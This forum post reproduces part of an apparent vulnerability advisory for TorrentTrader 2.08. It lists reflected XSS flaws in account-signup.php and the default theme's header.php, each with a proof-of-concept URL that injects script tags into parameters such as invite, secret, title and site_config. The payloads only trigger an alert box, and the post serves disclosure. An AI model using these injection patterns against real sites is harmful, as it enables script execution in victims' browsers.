Thread: Reflected XSS
View Single Post
  #1  
Old 11th April 2019, 02:22
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Default Reflected XSS
################################################## #############################
5. Reflected XSS in "account-signup.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &invite="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/account-signup.php?invite_row=1[/url] &secret="><script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################
6. Reflected XSS in "/themes/default/header.php"
################################################## #############################

Preconditions: "register_globals=on" Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] title=</title><script>alert(String.fromCharCode(88,83,83))</script> 
[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>[url]http://localhost/torrenttrader208/themes/default/header.php?[/url] site_config[SITEURL]=-->
<script>alert(String.fromCharCode(88,83,83))</script> 
################################################## #############################

Last edited by Thor; 14th April 2019 at 11:30. Reason: Edited Code to make it Readable
Reply With Quote